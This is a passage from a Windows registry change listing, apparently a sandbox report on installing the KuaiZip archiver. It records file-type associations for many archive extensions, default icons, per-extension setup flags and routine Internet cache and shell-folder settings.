"(Default)" = "KuaiZip.090"
[HKCR\KuaiZip_FileAsso.Origin\.018]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.09]
"(Default)" = "快压 09 压缩文件"
[HKCR\KuaiZip.014]
"(Default)" = "快压 014 压缩文件"
[HKCR\KuaiZip.kz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,1"
[HKCR\KuaiZip_FileAsso.Origin\.028]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.gzip]
"(Default)" = "快压 GZIP 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.mou]
"set" = "1"
[HKCR\KuaiZip.058\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.076]
"(Default)" = "快压 076 压缩文件"
[HKCR\KuaiZip.085\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.089]
"(Default)" = "KuaiZip.089"
[HKCR\KuaiZip.099]
"(Default)" = "快压 099 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.092]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.079\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.034\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.035]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.061\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.038]
"(Default)" = "NoAssociate.KZ"
[HKCR\.041]
"(Default)" = "KuaiZip.041"
[HKCR\KuaiZip.090\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCR\KuaiZip.043\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.01]
"(Default)" = "快压 01 压缩文件"
[HKCR\.092]
"(Default)" = "KuaiZip.092"
[HKCR\KuaiZip_FileAsso.Origin\.073]
"(Default)" = "NoAssociate.KZ"
[HKCR\.09]
"(Default)" = "KuaiZip.09"
[HKCR\KuaiZip_FileAsso.Origin\.052]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.057\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.011]
"(Default)" = "快压 011 压缩文件"
[HKCR\KuaiZip.045]
"(Default)" = "快压 045 压缩文件"
[HKCR\.085]
"(Default)" = "KuaiZip.085"
[HKCR\KuaiZip.011\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.094]
"(Default)" = "KuaiZip.094"
[HKCR\KuaiZip.075\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.03]
"(Default)" = "快压 03 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.012]
"(Default)" = "NoAssociate.KZ"
[HKCR\.cab]
"(Default)" = "KuaiZip.cab"
[HKCR\KuaiZip.019\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.046]
"(Default)" = "KuaiZip.046"
[HKCR\KuaiZip_FileAsso.Origin\.tgz]
"(Default)" = ""
[HKCR\.z]
"(Default)" = "KuaiZip.z"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.083]
"set" = "1"
[HKCR\KuaiZip.033\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.094\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.008]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.05]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.020\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.079]
"(Default)" = "KuaiZip.079"
[HKCR\KuaiZip.032\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.040]
"(Default)" = "KuaiZip.040"
[HKCR\KuaiZip.091\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.042]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.tgz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.099]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.064]
"(Default)" = "快压 064 压缩文件"
[HKCR\KuaiZip.009\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.093]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.04]
"set" = "1"
[HKCR\KuaiZip.037\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.077\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\KuaiZip.050]
"(Default)" = "快压 050 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.089]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.020\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.059]
"(Default)" = "快压 059 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.034]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.053]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.067]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.kz]
"(Default)" = ""
[HKCR\KuaiZip_FileAsso.Origin\.007]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.019]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.055]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.061]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\KuaiZip_FileAsso.Origin\.015]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.044]
"(Default)" = "快压 044 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.023]
"set" = "1"
[HKCR\.048]
"(Default)" = "KuaiZip.048"
[HKCR\KuaiZip_FileAsso.Origin\.078]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.051]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.056]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.051]
"(Default)" = "NoAssociate.KZ"
[HKCR\.042]
"(Default)" = "KuaiZip.042"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\KuaiZip.wim\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.023]
"(Default)" = "快压 023 压缩文件"
[HKCR\KuaiZip.053\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.020]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.059\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.mou]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.022]
"(Default)" = "NoAssociate.KZ"
[HKCR\.008]
"(Default)" = "KuaiZip.008"
[HKCR\KuaiZip.047\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1460397296"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.047]
"set" = "1"
[HKCR\KuaiZip.017\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.009]
"(Default)" = "KuaiZip.009"
[HKCR\KuaiZip.013\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.096\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.019]
"(Default)" = "KuaiZip.019"
[HKCR\KuaiZip.wim\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.085]
"(Default)" = "快压 085 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.039]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.036]
"(Default)" = "快压 036 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.064]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.tgz]
"set" = "1"
[HKCR\.002]
"(Default)" = "KuaiZip.002"
[HKCR\.018]
"(Default)" = "KuaiZip.018"
[HKCR\KuaiZip_FileAsso.Origin\.030]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.021]
"(Default)" = "快压 021 压缩文件"
[HKCR\KuaiZip.jar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.065\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.083]
"(Default)" = "快压 083 压缩文件"
[HKCR\KuaiZip.049\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.048\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.025]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.017]
"set" = "1"
[HKCR\KuaiZip.037]
"(Default)" = "快压 037 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.015]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.012]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.069]
"set" = "1"
[HKCR\KuaiZip.074]
"(Default)" = "快压 074 压缩文件"
[HKCR\KuaiZip.004\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.04]
"(Default)" = "快压 04 压缩文件"
[HKCR\KuaiZip.022]
"(Default)" = "快压 022 压缩文件"
[HKCR\.022]
"(Default)" = "KuaiZip.022"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.021]
"set" = "1"
[HKCR\.028]
"(Default)" = "KuaiZip.028"
[HKCR\KuaiZip.049\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.049]
"(Default)" = "快压 049 压缩文件"
[HKCR\.015]
"(Default)" = "KuaiZip.015"
[HKCR\KuaiZip.082\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.009]
"(Default)" = "快压 009 压缩文件"
[HKCR\.020]
"(Default)" = "KuaiZip.020"
[HKCR\KuaiZip.wim]
"(Default)" = "快压 WIM 压缩文件"
[HKCR\KuaiZip.019]
"(Default)" = "快压 019 压缩文件"
[HKCR\KuaiZip.050\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.093]
"(Default)" = "KuaiZip.093"
[HKCR\.095]
"(Default)" = "KuaiZip.095"
[HKCR\KuaiZip.071\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.038]
"set" = "1"
[HKCR\KuaiZip.090\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.044\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.wim]
"set" = "1"
[HKCR\.049]
"(Default)" = "KuaiZip.049"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.01]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.06]
"set" = "1"
[HKCR\KuaiZip.036\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.002]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\KuaiZip.048\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.018]
"(Default)" = "快压 018 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.09]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.zip]
"set" = "1"
[HKCR\KuaiZip.073\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.006]
"(Default)" = "快压 006 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.wim]
"(Default)" = "NoAssociate.KZ"
[HKCR\.075]
"(Default)" = "KuaiZip.075"
[HKCR\KuaiZip.078\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.cab\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.097]
"(Default)" = "快压 097 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\KuaiZip.098\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.02]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.085]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.072]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.bz2\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.038]
"(Default)" = "快压 038 压缩文件"
[HKCR\KuaiZip.04\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.013]
"(Default)" = "KuaiZip.013"
[HKCR\.072]
"(Default)" = "KuaiZip.072"
[HKCR\KuaiZip.084]
"(Default)" = "快压 084 压缩文件"
[HKCR\KuaiZip.z\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.019]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.084]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.052]
"(Default)" = "快压 052 压缩文件"
[HKCR\KuaiZip.048]
"(Default)" = "快压 048 压缩文件"
[HKCR\KuaiZip.078\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.008]
"(Default)" = "快压 008 压缩文件"
[HKCR\KuaiZip.069\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.099]
"(Default)" = "KuaiZip.099"
[HKCR\KuaiZip.060\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.042\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.014]
"(Default)" = "KuaiZip.014"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.005]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.083]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.088]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.067\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.gz]
"(Default)" = "快压 GZ 压缩文件"
[HKCR\.074]
"(Default)" = "KuaiZip.074"
[HKCR\KuaiZip_FileAsso.Origin\.077]
"(Default)" = "NoAssociate.KZ"
[HKCR\.06]
"(Default)" = "KuaiZip.06"
[HKCR\KuaiZip_FileAsso.Origin\.058]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.gz]
"(Default)" = ""
[HKCU\Software\KuaiZip\KuaiZip\Setup\.006]
"set" = "1"
[HKCR\.023]
"(Default)" = "KuaiZip.023"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\KuaiZip_FileAsso.Origin\.tar]
"(Default)" = ""
[HKCR\KuaiZip.089]
"(Default)" = "快压 089 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.cab]
"(Default)" = "CLSID\{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.090]
"set" = "1"
[HKCR\KuaiZip.013\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.076]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.05\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.012\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.055]
"(Default)" = "KuaiZip.055"
[HKCR\KuaiZip.074\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.074]
"(Default)" = "NoAssociate.KZ"
[HKCR\.073]
"(Default)" = "KuaiZip.073"
[HKCR\KuaiZip_FileAsso.Origin\.7z]
"(Default)" = ""
[HKCR\KuaiZip.005\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.016]
"(Default)" = "快压 016 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.092]
"set" = "1"
[HKCR\.058]
"(Default)" = "KuaiZip.058"
[HKCR\KuaiZip.093]
"(Default)" = "快压 093 压缩文件"
[HKCR\KuaiZip.015\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.001\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.056\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.bz2]
"(Default)" = "快压 BZ2 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.026]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.kz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.027]
"(Default)" = "KuaiZip.027"
[HKCR\KuaiZip.gz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.005]
"(Default)" = "快压 005 压缩文件"
[HKCR\.037]
"(Default)" = "KuaiZip.037"
[HKCR\KuaiZip_FileAsso.Origin\.080]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.061\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.093\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.080]
"(Default)" = "KuaiZip.080"
[HKCR\KuaiZip.082\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.lzh]
"(Default)" = "KuaiZip.lzh"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.074]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.011]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.010]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.gzip]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.01]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.046]
"(Default)" = "NoAssociate.KZ"
[HKCR\.050]
"(Default)" = "KuaiZip.050"
[HKCR\KuaiZip.067]
"(Default)" = "快压 067 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.054]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.029]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.lzh]
"(Default)" = "快压 LZH 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.arj]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.030]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.024]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.06\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.066\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.080]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\KuaiZip.054\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.040]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.092\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.032]
"(Default)" = "NoAssociate.KZ"
[HKCR\.059]
"(Default)" = "KuaiZip.059"
[HKCR\KuaiZip.08\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.093\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.053\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.07]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.003\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.044]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.001\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.arj\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.030\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.096]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.043]
"set" = "1"
[HKCR\KuaiZip.004]
"(Default)" = "快压 004 压缩文件"
[HKCR\KuaiZip.077\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.091]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.035]
"set" = "1"
[HKCR\KuaiZip.gzip\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.cab]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCR\KuaiZip.030\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.027]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.093]
"set" = "1"
[HKCR\KuaiZip.032]
"(Default)" = "快压 032 压缩文件"
[HKCR\.091]
"(Default)" = "KuaiZip.091"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\KuaiZip_FileAsso.Origin\.08]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.095\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.048]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.jar]
"set" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\.096]
"(Default)" = "KuaiZip.096"
[HKCR\KuaiZip.055]
"(Default)" = "快压 055 压缩文件"
[HKCR\.038]
"(Default)" = "KuaiZip.038"
[HKCR\KuaiZip_FileAsso.Origin\.014]
"(Default)" = "NoAssociate.KZ"
[HKCR\.062]
"(Default)" = "KuaiZip.062"
[HKCR\KuaiZip_FileAsso.Origin\.060]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.arj]
"(Default)" = "快压 ARJ 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.06]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.063\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.01]
"(Default)" = "KuaiZip.01"
[HKCR\KuaiZip.tar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.kz]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.032]
"set" = "1"
[HKCR\.03]
"(Default)" = "KuaiZip.03"
[HKCR\KuaiZip.058\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.071]
"(Default)" = "快压 071 压缩文件"
[HKCR\KuaiZip.023\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.066]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.007\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.037]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.zip]
"(Default)" = "快压 ZIP 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.086]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.091\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.jar]
"(Default)" = "快压 JAR 压缩文件"
[HKCR\KuaiZip.080\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.046\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tar]
"(Default)" = "快压 TAR 压缩文件"
[HKCR\.wim]
"(Default)" = "KuaiZip.wim"
[HKCR\KuaiZip.032\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.086\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.031\DefaultIcon]
